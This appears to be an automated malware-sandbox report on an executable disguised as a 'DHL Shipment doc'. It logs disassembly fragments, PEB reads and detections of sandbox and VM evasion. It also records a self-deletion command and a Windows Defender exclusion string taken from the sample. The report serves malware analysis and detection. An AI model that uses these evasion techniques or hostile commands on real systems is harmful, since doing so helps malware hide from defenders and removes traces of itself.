          Source: 3.0.DHL Shipment doc.exe.930000.0.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 3.0.DHL Shipment doc.exe.930000.1.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 0_2_0190F448 push esp; retf 0_2_0190F455
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 0_2_01901C58 push ebx; iretd 0_2_01901C7A
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_0041B832 push eax; ret 3_2_0041B838
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_0041B83B push eax; ret 3_2_0041B8A2
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_0041B89C push eax; ret 3_2_0041B8A2
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_0040825A push ecx; retf 3_2_0040825B
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_0040C38A pushfd ; ret 3_2_0040C3A0
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_00415CC4 push FFFFFFDFh; iretd 3_2_00415CDA
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_0041B7E5 push eax; ret 3_2_0041B838
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D5D0D1 push ecx; ret 11_2_04D5D0E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EAB89C push eax; ret 11_2_00EAB8A2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EAB83B push eax; ret 11_2_00EAB8A2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EAB832 push eax; ret 11_2_00EAB838
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00E9825A push ecx; retf 11_2_00E9825B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00E9C38A pushfd ; ret 11_2_00E9C3A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EA5CC4 push FFFFFFDFh; iretd 11_2_00EA5CDA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EAB7E5 push eax; ret 11_2_00EAB838
          Source: DHL Shipment doc.exeStatic PE information: 0x9CDF513F [Mon May 26 14:03:43 2053 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.71171540744

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: /c del "C:\Users\user\Desktop\DHL Shipment doc.exe"
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara matchFile source: 0.2.DHL Shipment doc.exe.34817e0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL Shipment doc.exe.3431884.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.692850983.0000000003442000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: DHL Shipment doc.exe PID: 5032, type: MEMORYSTR
          Source: DHL Shipment doc.exe, 00000000.00000002.692850983.0000000003442000.00000004.00000800.00020000.00000000.sdmp, DHL Shipment doc.exe, 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: DHL Shipment doc.exe, 00000000.00000002.692850983.0000000003442000.00000004.00000800.00020000.00000000.sdmp, DHL Shipment doc.exe, 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe TID: 6516Thread sleep time: -33638s >= -30000s
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe TID: 2124Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3220Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_004088E0 rdtsc 3_2_004088E0
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.4 %
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeThread delayed: delay time: 33638
          Source: DHL Shipment doc.exe, 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.711726949.000000000FD29000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}
          Source: explorer.exe, 00000006.00000000.709401670.000000000A897000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: DHL Shipment doc.exe, 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.717648166.0000000004791000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.745779172.000000000A60E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: DHL Shipment doc.exe, 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.702067652.0000000006650000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.708216741.000000000A716000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000006.00000000.746609215.000000000A897000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA`
          Source: explorer.exe, 00000006.00000000.734788131.0000000004710000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000006.00000000.708216741.000000000A716000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000006.00000000.708216741.000000000A716000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: DHL Shipment doc.exe, 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_004088E0 rdtsc 3_2_004088E0
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D17E41 mov eax, dword ptr fs:[00000030h]11_2_04D17E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DCAE44 mov eax, dword ptr fs:[00000030h]11_2_04DCAE44
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DCAE44 mov eax, dword ptr fs:[00000030h]11_2_04DCAE44
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D2AE73 mov eax, dword ptr fs:[00000030h]11_2_04D2AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D2AE73 mov eax, dword ptr fs:[00000030h]11_2_04D2AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D2AE73 mov eax, dword ptr fs:[00000030h]11_2_04D2AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D2AE73 mov eax, dword ptr fs:[00000030h]11_2_04D2AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D2AE73 mov eax, dword ptr fs:[00000030h]11_2_04D2AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D1766D mov eax, dword ptr fs:[00000030h]11_2_04D1766D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3A61C mov eax, dword ptr fs:[00000030h]11_2_04D3A61C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3A61C mov eax, dword ptr fs:[00000030h]11_2_04D3A61C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0C600 mov eax, dword ptr fs:[00000030h]11_2_04D0C600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0C600 mov eax, dword ptr fs:[00000030h]11_2_04D0C600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0C600 mov eax, dword ptr fs:[00000030h]11_2_04D0C600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D38E00 mov eax, dword ptr fs:[00000030h]11_2_04D38E00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DC1608 mov eax, dword ptr fs:[00000030h]11_2_04DC1608
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DBFE3F mov eax, dword ptr fs:[00000030h]11_2_04DBFE3F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0E620 mov eax, dword ptr fs:[00000030h]11_2_04D0E620
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D437F5 mov eax, dword ptr fs:[00000030h]11_2_04D437F5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D18794 mov eax, dword ptr fs:[00000030h]11_2_04D18794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D87794 mov eax, dword ptr fs:[00000030h]11_2_04D87794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D87794 mov eax, dword ptr fs:[00000030h]11_2_04D87794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D87794 mov eax, dword ptr fs:[00000030h]11_2_04D87794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D1EF40 mov eax, dword ptr fs:[00000030h]11_2_04D1EF40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D1FF60 mov eax, dword ptr fs:[00000030h]11_2_04D1FF60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD8F6A mov eax, dword ptr fs:[00000030h]11_2_04DD8F6A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D2F716 mov eax, dword ptr fs:[00000030h]11_2_04D2F716
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D9FF10 mov eax, dword ptr fs:[00000030h]11_2_04D9FF10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D9FF10 mov eax, dword ptr fs:[00000030h]11_2_04D9FF10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD070D mov eax, dword ptr fs:[00000030h]11_2_04DD070D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD070D mov eax, dword ptr fs:[00000030h]11_2_04DD070D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3A70E mov eax, dword ptr fs:[00000030h]11_2_04D3A70E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3A70E mov eax, dword ptr fs:[00000030h]11_2_04D3A70E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3E730 mov eax, dword ptr fs:[00000030h]11_2_04D3E730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D04F2E mov eax, dword ptr fs:[00000030h]11_2_04D04F2E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D04F2E mov eax, dword ptr fs:[00000030h]11_2_04D04F2E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D9B8D0 mov eax, dword ptr fs:[00000030h]11_2_04D9B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D9B8D0 mov ecx, dword ptr fs:[00000030h]11_2_04D9B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D9B8D0 mov eax, dword ptr fs:[00000030h]11_2_04D9B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D9B8D0 mov eax, dword ptr fs:[00000030h]11_2_04D9B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D9B8D0 mov eax, dword ptr fs:[00000030h]11_2_04D9B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D9B8D0 mov eax, dword ptr fs:[00000030h]11_2_04D9B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D058EC mov eax, dword ptr fs:[00000030h]11_2_04D058EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D09080 mov eax, dword ptr fs:[00000030h]11_2_04D09080
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D83884 mov eax, dword ptr fs:[00000030h]11_2_04D83884
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D83884 mov eax, dword ptr fs:[00000030h]11_2_04D83884
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3F0BF mov ecx, dword ptr fs:[00000030h]11_2_04D3F0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3F0BF mov eax, dword ptr fs:[00000030h]11_2_04D3F0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3F0BF mov eax, dword ptr fs:[00000030h]11_2_04D3F0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D320A0 mov eax, dword ptr fs:[00000030h]11_2_04D320A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D320A0 mov eax, dword ptr fs:[00000030h]11_2_04D320A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D320A0 mov eax, dword ptr fs:[00000030h]11_2_04D320A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D320A0 mov eax, dword ptr fs:[00000030h]11_2_04D320A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D320A0 mov eax, dword ptr fs:[00000030h]11_2_04D320A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D320A0 mov eax, dword ptr fs:[00000030h]11_2_04D320A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D490AF mov eax, dword ptr fs:[00000030h]11_2_04D490AF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D20050 mov eax, dword ptr fs:[00000030h]11_2_04D20050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D20050 mov eax, dword ptr fs:[00000030h]11_2_04D20050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD1074 mov eax, dword ptr fs:[00000030h]11_2_04DD1074
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DC2073 mov eax, dword ptr fs:[00000030h]11_2_04DC2073
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD4015 mov eax, dword ptr fs:[00000030h]11_2_04DD4015
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD4015 mov eax, dword ptr fs:[00000030h]11_2_04DD4015
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D87016 mov eax, dword ptr fs:[00000030h]11_2_04D87016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D87016 mov eax, dword ptr fs:[00000030h]11_2_04D87016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D87016 mov eax, dword ptr fs:[00000030h]11_2_04D87016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D1B02A mov eax, dword ptr fs:[00000030h]11_2_04D1B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D1B02A mov eax, dword ptr fs:[00000030h]11_2_04D1B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D1B02A mov eax, dword ptr fs:[00000030h]11_2_04D1B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D1B02A mov eax, dword ptr fs:[00000030h]11_2_04D1B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3002D mov eax, dword ptr fs:[00000030h]11_2_04D3002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3002D mov eax, dword ptr fs:[00000030h]11_2_04D3002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3002D mov eax, dword ptr fs:[00000030h]11_2_04D3002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3002D mov eax, dword ptr fs:[00000030h]11_2_04D3002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3002D mov eax, dword ptr fs:[00000030h]11_2_04D3002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D941E8 mov eax, dword ptr fs:[00000030h]11_2_04D941E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0B1E1 mov eax, dword ptr fs:[00000030h]11_2_04D0B1E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0B1E1 mov eax, dword ptr fs:[00000030h]11_2_04D0B1E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0B1E1 mov eax, dword ptr fs:[00000030h]11_2_04D0B1E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D32990 mov eax, dword ptr fs:[00000030h]11_2_04D32990
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D2C182 mov eax, dword ptr fs:[00000030h]11_2_04D2C182
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3A185 mov eax, dword ptr fs:[00000030h]11_2_04D3A185
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D851BE mov eax, dword ptr fs:[00000030h]11_2_04D851BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D851BE mov eax, dword ptr fs:[00000030h]11_2_04D851BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D851BE mov eax, dword ptr fs:[00000030h]11_2_04D851BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D851BE mov eax, dword ptr fs:[00000030h]11_2_04D851BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D361A0 mov eax, dword ptr fs:[00000030h]11_2_04D361A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D361A0 mov eax, dword ptr fs:[00000030h]11_2_04D361A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D869A6 mov eax, dword ptr fs:[00000030h]11_2_04D869A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D2B944 mov eax, dword ptr fs:[00000030h]11_2_04D2B944
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D2B944 mov eax, dword ptr fs:[00000030h]11_2_04D2B944
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0B171 mov eax, dword ptr fs:[00000030h]11_2_04D0B171
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0B171 mov eax, dword ptr fs:[00000030h]11_2_04D0B171
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0C962 mov eax, dword ptr fs:[00000030h]11_2_04D0C962
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D09100 mov eax, dword ptr fs:[00000030h]11_2_04D09100
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D09100 mov eax, dword ptr fs:[00000030h]11_2_04D09100
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D09100 mov eax, dword ptr fs:[00000030h]11_2_04D09100
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3513A mov eax, dword ptr fs:[00000030h]11_2_04D3513A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3513A mov eax, dword ptr fs:[00000030h]11_2_04D3513A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D24120 mov eax, dword ptr fs:[00000030h]11_2_04D24120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D24120 mov eax, dword ptr fs:[00000030h]11_2_04D24120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D24120 mov eax, dword ptr fs:[00000030h]11_2_04D24120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D24120 mov eax, dword ptr fs:[00000030h]11_2_04D24120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D24120 mov ecx, dword ptr fs:[00000030h]11_2_04D24120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D32ACB mov eax, dword ptr fs:[00000030h]11_2_04D32ACB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D32AE4 mov eax, dword ptr fs:[00000030h]11_2_04D32AE4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3D294 mov eax, dword ptr fs:[00000030h]11_2_04D3D294
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3D294 mov eax, dword ptr fs:[00000030h]11_2_04D3D294
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D1AAB0 mov eax, dword ptr fs:[00000030h]11_2_04D1AAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D1AAB0 mov eax, dword ptr fs:[00000030h]11_2_04D1AAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3FAB0 mov eax, dword ptr fs:[00000030h]11_2_04D3FAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D052A5 mov eax, dword ptr fs:[00000030h]11_2_04D052A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D052A5 mov eax, dword ptr fs:[00000030h]11_2_04D052A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D052A5 mov eax, dword ptr fs:[00000030h]11_2_04D052A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D052A5 mov eax, dword ptr fs:[00000030h]11_2_04D052A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D052A5 mov eax, dword ptr fs:[00000030h]11_2_04D052A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DCEA55 mov eax, dword ptr fs:[00000030h]11_2_04DCEA55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D94257 mov eax, dword ptr fs:[00000030h]11_2_04D94257
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D09240 mov eax, dword ptr fs:[00000030h]11_2_04D09240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D09240 mov eax, dword ptr fs:[00000030h]11_2_04D09240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D09240 mov eax, dword ptr fs:[00000030h]11_2_04D09240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D09240 mov eax, dword ptr fs:[00000030h]11_2_04D09240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D4927A mov eax, dword ptr fs:[00000030h]11_2_04D4927A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DBB260 mov eax, dword ptr fs:[00000030h]11_2_04DBB260
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DBB260 mov eax, dword ptr fs:[00000030h]11_2_04DBB260
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD8A62 mov eax, dword ptr fs:[00000030h]11_2_04DD8A62
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D05210 mov eax, dword ptr fs:[00000030h]11_2_04D05210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D05210 mov ecx, dword ptr fs:[00000030h]11_2_04D05210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D05210 mov eax, dword ptr fs:[00000030h]11_2_04D05210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D05210 mov eax, dword ptr fs:[00000030h]11_2_04D05210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0AA16 mov eax, dword ptr fs:[00000030h]11_2_04D0AA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0AA16 mov eax, dword ptr fs:[00000030h]11_2_04D0AA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DCAA16 mov eax, dword ptr fs:[00000030h]11_2_04DCAA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DCAA16 mov eax, dword ptr fs:[00000030h]11_2_04DCAA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D23A1C mov eax, dword ptr fs:[00000030h]11_2_04D23A1C
